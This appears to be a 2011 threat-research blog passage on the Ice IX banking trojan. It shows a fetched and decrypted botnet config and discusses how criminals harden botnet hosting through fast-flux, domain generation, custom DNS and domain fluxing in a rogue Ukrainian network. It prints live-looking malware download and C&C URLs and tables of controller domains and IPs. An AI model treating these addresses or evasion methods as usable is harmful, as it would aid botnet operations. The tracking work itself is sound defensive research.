Connecting to chilloutcaffee.net|123.30.129.251|:80… connected.
HTTP request sent, awaiting response…
HTTP/1.1 200 OK
Date: Thu, 25 Aug 2011 XX:XX:XX GMT
Server: Apache/2
[...]
Length: 41370 (40K) [text/plain]
Saving to: `ccc.php’

100%[==============>] 41,370 7.80K/s in 5.2s

2011-08-25 XX:XX:XX (7.80 KB/s) – `ccc.php’ saved [41370/41370]

Uh?

$ file ccc.php
ccc.php: data

Looks good…

$ md5sum ccc.php
f673999a9de960d5ae0d9d72beaf0433 ccc.php

Let’s try to decrypt it…

Version: 1.0.5.0
url_loader (binary download)
http://chilloutcaffee.net/photos/zb1/cc/bot.exe
url_server (dropzone)
http://chilloutcaffee.net/photos/zb1/gate.php
entry “AdvancedConfigs” (backup config files)
http://chilloutcaffee2.net/photos/zb1/cc/ccc.php

url_wfrules
Nhttp://*odnoklassniki.ru/*
Nhttp://vkontakte.ru/*
S*/login.osmp.ru/*
S*/atl.osmp.ru/*
[...]

é voilà – Ice IX config file successfully downloaded and decrypted. You just need to do some wget Kung Fu and you need to have the binary to extract the RC4 key in order to decrypt the Ice IX config file and to construct the correct hash value in the URL used to query the configuration file.

Below is a list of Ice IX botnet controllers I’ve seen so far:

http://frcfir.com/cfg/logo.php
http://ziigmmn.com/logo.php

Is Ice IX a new threat? Not really. It has the same functionality as ZeuS, but it tries to evade ZeuS Tracker & Co (but royally fails). I will continue to monitor the situation.

*** Further reading ***

How Criminals Defend Their Rogue Networks

admin — Thu, 28 Jul 2011 18:58:26 +0000

It is common that cybercriminals are hosting their stuff in rogue networks (renting out so-called Bulletproof hosted servers). Many of you may remember the year 2008, when a well known Bulletproof hoster named McColo was knocked offline. We can say that this nearly was a historical moment in the history of the world wide web, where the Internet community clearly showed that they didn’t want to tolerate Cybercrime any longer. The McColo takedown was the beginning of a series of takedowns initiated by security researchers, law enforcement agencies and volunteers; In 2010, the well known Russian based Bulletproof hoster Troyak was cut off from the Internet, followed by the takedown of Group Vertical.

The series of takedowns continued in the beginning of 2011, when in January 14 rogue ISPs were disconnected from the Internet. Since then we didn’t see any new Bulletproof hosters popping up… or did we? Where did all the Cybercriminals move to? If we take a look at the ZeuS Tracker statistic (Top ten ZeuS hosting ISPs) we don’t see any network that would look too much like a Bulletproof hoster.

So the Internet appears to be free from cybercrime… *cough* – unfortunately I have to disappoint everyone who thought that the Internet is getting rid of Cybercrime: The Bulletproof hosters are still here. I still see a lot of fraud, malware, phishing etc popping up on a daily basis. But where is it hosted? As you probably know, Cybercriminals can be very creative. They found several ways to hide themselves from the radar of the security industry and from the eyes of security researchers. Some of there tactics are very old, while some of them are pretty new.

FastFlux hosting
FastFlux hosting is a pretty old technique and still an issue (but not that big any more): Cybercriminals are hosting their infrastructure on FastFlux botnets to hide the real botnet controllers (mothership) and to make their infrastructure more hardened against takedowns. During the past few months the situation haven’t really changed. The number of FastFlux hosted ZeuS botnet controllers is more or less constantly 19. What is new is the fact that the Cybercriminals have also started to host SpyEye botnet controllers on FastFlux botnets. Currently SpyEye Tracker tracks 8 SpyEye C&Cs controllers that are hosted on FastFlux botnets.

Domain Generation Algorithms (DGA)
A much more sophisticated way to serve/host botnet control infrastructure are so called Domain Generation Algorithms (DGA). The criminals are using an algorithm that is using date and some salt as parameter to generate the domains the infected computers (bots) should contact. In this way the domains are being ‘fluxed’ on a daily basis – meaning the CnC domains that are used by the bots are changing every day, or in some cases several times a day – which makes it hard to take down the botnet control infrastructure. Last year, a special version of ZeuS (murofet/LICAT) that used the DGA technique covered some media attention. But in fact the technique isn’t new: Torpig, a sophisticated banking Trojan, has been using a DGA since 2008. Torpig even utilized the Twitter trend API, as mentioned in this old post by unmaskparasites.

How ever sophisticated this technique sounds, DGA can have a benefit for security researchers: If you are able to reverse engineer the code, you are able to identify the algorithm used by the Trojan. In this way it is possible to generate the domain names that the Trojan will use in the future and register them to sinkhole the botnet. However, there are some Trojans that are generating more than 50’000 domains per day. This would mean that you have to register 50’000 domains every day to sinkhole the botnet effectively.

Using custom DNS servers
Another interesting tactic that I’ve seen recently is the use of custom DNS servers. Some Trojans are using custom DNS servers that are under control of the criminals themselves. The Trojan resolves the domain name used as botnet controller using a custom DNS server. The benefit for the criminal is, that only the DNS server that is under control of himself is resolving the domain name correctly. In fact this means when a security researcher tries to access the domain it appears that it does not exist.

Also, the criminal can use well known domain names like google.com or facebook.com as botnet controllers. Due to the fact that the Trojan resolves the domains using the custom DNS servers the criminal can point the domain name to his botnet controller. In this case the benefit for the criminal is that e.g. google.com appears in the sandbox reports of the Security Industry and may lead to false positives in security products. So the criminals can catch two birds with one stone: Hiding their botnet infrastructure behind a well known domain name and making Security Products imprecise.

Since version 10338 (1.3.38, first seen around April 4 2011), certain SpyEye versions has been seen utilizing such a feature. The botnet master can define custom DNS servers that are being stored in a file called “dns.txt” that is served to the bots within the SpyEye configuration file. However, usually public DNS servers are listed in this dns.txt file, like the ones offered by Google. This is a trick to avoid local DNS blackholing and to avoid detection by looking at local DNS server logs.

Fluxing domain names
After the takedown of several rogue ISPs in January 2011, I’ve seen a big amount of botnet controllers popping up in some suspicious networks. What got my attention was the fact that as soon as I had added a botnet controller to the tracker the domain disappeared and became unreachable. A few hours later a backup domain pointing to the same or nearby IP address in the same subnet came active.

I’ve seen this behaviour on several ISPs that are all looking quite suspicious to me. A good example is AS56659 BALTI-AS (also known as PermInterSvyaz LTD and BESTISP), a Ukraine-based ISP that is being routed by Er-Telecom -> synterra.ru. Currently, there are 5 ZeuS botnet controllers tracker by ZeuS Tracker, none of them are currently active. SpyEye Tracker currently tracks 11 SpyEye botnet controllers in that subnet. Only one is currently active. At first glance this AS does not look that suspicious, but if we take a look at this history of the subnet we see that it hosted more than 60 SpyEye botnet controllers since March 2011:

# Timestamp (UTC) | Domain | IP address | AS number | AS name | Country Code
2011-05-02 16:18:05 | opilori.com | 194.28.44.196 | AS56659 | BALTI-AS OOO | UA
2011-05-19 17:02:55 | gameopiloris.com | 194.28.44.159 | AS56659 | BALTI-AS OOO | UA
2011-06-11 20:51:10 | cmakdohaio93.in | 195.14.112.80 | AS56659 | BALTI-AS OOO | UA
2011-06-13 08:37:27 | cmakdohaio93.in | 195.14.112.80 | AS56659 | BALTI-AS OOO | UA
2011-06-16 13:53:34 | alunionylogen.ru | 195.14.112.72 | AS56659 | BALTI-AS OOO | UA
2011-06-16 19:51:46 | cmakdocolo19.in | 195.14.112.85 | AS56659 | BALTI-AS OOO | UA
2011-06-18 08:33:12 | ohiotexas1978.in | 195.14.112.94 | AS56659 | BALTI-AS OOO | UA
2011-06-19 15:08:48 | gameopiloris.com | 194.28.44.39 | AS56659 | BALTI-AS OOO | UA
2011-06-21 16:48:57 | zeblikino019.in | 195.14.112.105 | AS56659 | BALTI-AS OOO | UA
2011-06-26 14:28:59 | juengerbi781.in | 195.14.112.111 | AS56659 | BALTI-AS OOO | UA
2011-06-27 08:17:03 | ziabslikino47.in | 195.14.112.116 | AS56659 | BALTI-AS OOO | UA
2011-06-27 14:55:25 | dnsfiarfucktorylockup.in | 195.14.112.73 | AS56659 | BALTI-AS OOO | UA
2011-06-28 17:47:31 | hahahaitismydome.in | 195.14.112.125 | AS56659 | BALTI-AS OOO | UA
2011-06-29 14:24:51 | nemiroffvodka.in | 195.14.112.128 | AS56659 | BALTI-AS OOO | UA
2011-07-05 13:47:09 | cmakdomass19.in | 195.14.112.102 | AS56659 | BALTI-AS OOO | UA
2011-07-05 15:23:33 | halkozukin33.in | 195.14.112.118 | AS56659 | BALTI-AS OOO | UA
2011-07-05 16:08:27 | zelikinder019.in | 195.14.112.108 | AS56659 | BALTI-AS OOO | UA
2011-07-05 16:45:49 | abelopatianeer.ru | 195.14.112.97 | AS56659 | BALTI-AS OOO | UA
2011-07-06 12:19:17 | unkvarante.ru | 195.14.112.136 | AS56659 | BALTI-AS OOO | UA
2011-07-06 13:23:26 | unkvarante.ru | 195.14.112.136 | AS56659 | BALTI-AS OOO | UA
2011-07-06 21:02:21 | diexr.ru | 195.14.112.75 | AS56659 | BALTI-AS OOO | UA
2011-07-07 05:32:33 | diexr.ru | 195.14.112.137 | AS56659 | BALTI-AS OOO | UA
2011-07-07 05:39:20 | diexr.ru | 195.14.112.137 | AS56659 | BALTI-AS OOO | UA
2011-07-07 09:57:46 | 3qwpocol.com | 195.14.112.244 | AS56659 | BALTI-AS OOO | UA
2011-07-07 11:26:23 | 3qwpocol.com | 195.14.112.246 | AS56659 | BALTI-AS OOO | UA
2011-07-08 06:39:56 | 3qwpocol.com | 195.14.112.244 | AS56659 | BALTI-AS OOO | UA
2011-07-08 11:14:17 | 3qwpocol.com | 195.14.112.246 | AS56659 | BALTI-AS OOO | UA
2011-07-08 12:14:50 | 3qwpocol.com | 195.14.112.244 | AS56659 | BALTI-AS OOO | UA
2011-07-08 20:12:23 | unkvarante.ru | 195.14.112.136 | AS56659 | BALTI-AS OOO | UA
2011-07-09 21:37:13 | unkvarante.ru | 195.14.112.136 | AS56659 | BALTI-AS OOO | UA
2011-07-10 15:10:36 | unkvarante.ru | 195.14.112.136 | AS56659 | BALTI-AS OOO | UA
2011-07-11 04:43:30 | diexe.ru | 195.14.112.245 | AS56659 | BALTI-AS OOO | UA
2011-07-11 05:25:34 | nokiamobilecorporation.in | 195.14.112.248 | AS56659 | BALTI-AS OOO | UA
2011-07-11 17:54:31 | unkvarante.ru | 195.14.112.136 | AS56659 | BALTI-AS OOO | UA
2011-07-12 06:34:04 | unkvarante.ru | 195.14.112.136 | AS56659 | BALTI-AS OOO | UA
2011-07-12 08:53:25 | unkvarante.ru | 195.14.112.136 | AS56659 | BALTI-AS OOO | UA
2011-07-13 05:17:31 | 3qwpocol.com | 195.14.112.242 | AS56659 | BALTI-AS OOO | UA
2011-07-13 05:19:35 | benbog.com | 195.14.112.218 | AS56659 | BALTI-AS OOO | UA
2011-07-13 05:35:57 | gaqwpo.com | 195.14.112.246 | AS56659 | BALTI-AS OOO | UA
2011-07-13 05:36:32 | bonobon7.com | 195.14.112.214 | AS56659 | BALTI-AS OOO | UA
2011-07-13 05:54:07 | colqwpo.com | 195.14.112.250 | AS56659 | BALTI-AS OOO | UA
2011-07-13 06:00:11 | udostrejas.com | 195.14.112.60 | AS56659 | BALTI-AS OOO | UA
2011-07-13 06:00:32 | starterkit1.com | 195.14.112.213 | AS56659 | BALTI-AS OOO | UA
2011-07-13 06:05:58 | diexr.com | 195.14.112.49 | AS56659 | BALTI-AS OOO | UA
2011-07-13 07:37:45 | lineclock.com | 195.14.112.27 | AS56659 | BALTI-AS OOO | UA
2011-07-14 10:35:32 | diexri.com | 195.14.112.240 | AS56659 | BALTI-AS OOO | UA
2011-07-14 11:48:02 | murkinduxck.co.tv | 195.14.112.204 | AS56659 | BALTI-AS OOO | UA
2011-07-15 08:34:38 | murkinduxck1.co.tv | 195.14.112.224 | AS56659 | BALTI-AS OOO | UA
2011-07-15 10:53:58 | wupd64.com | 195.14.112.216 | AS56659 | BALTI-AS OOO | UA
2011-07-15 17:25:45 | wupd643.com | 195.14.112.226 | AS56659 | BALTI-AS OOO | UA
2011-07-23 08:37:36 | etopala.com | 195.14.112.220 | AS56659 | BALTI-AS OOO | UA
2011-07-23 08:47:07 | 44qwpoco.com | 195.14.112.234 | AS56659 | BALTI-AS OOO | UA
2011-07-23 18:40:28 | etopala3.com | 195.14.112.229 | AS56659 | BALTI-AS OOO | UA
2011-07-24 08:29:53 | 44qwpoga.com | 195.14.112.69 | AS56659 | BALTI-AS OOO | UA

I assume that the criminals are using some kind of script to check ZeuS- and SpyEye Tracker periodically for new botnet controllers in their subnet. As soon as a new domain pops up they seem to remove it and switch over to a backup URL (both ZeuS and SpyEye have a feature that allows the cybercriminals to define backup URLs that the bots should contact when the main C&C is not reachable).

But what’s the benefit of this tactic for the criminal? Well, Cybercriminals have seen in the past that they will get de-peered quite quickly when they attract to much attention from law enforcement and security researchers. By fluxing the domain name as soon as it appear on a tracker, they ensure that the number of active botnet controllers stay as low as possible. Therefore they will not appear on the radar of the Internet community that fast and of course they can claim that they take action against fraudulent customers quickly.

Conclusion
What we can say is that BALTI-AS is a rogue network for sure. I haven’t seen any legit domain names being hosted there.

Also, the criminals are quite creative and will always try to not appear on the radar of the Internet community. It’s always a cat and mouse game between the infosec community and the criminals who are operating the different botnet infrastructures.

As we all know, things can change quite fast in the Internet. This is a big issue for policy makers and law enforcement. They are not able to act as quick as the criminals do. The cybercriminals knows this too and are trying to make profit with the failing of the law enforcement.

The Internet has no borders so we need a global solution to defend ourselves from cybercrime. But we are still failing to find a global solution. Fortunately, there are dedicated people out there that are determined to fight cybercrime. When these people cooperate, they are able to move mountains.

Good deeds are being done by these folks every day. We just need more of them. And we need governments and organisations across the world to follow in their footsteps.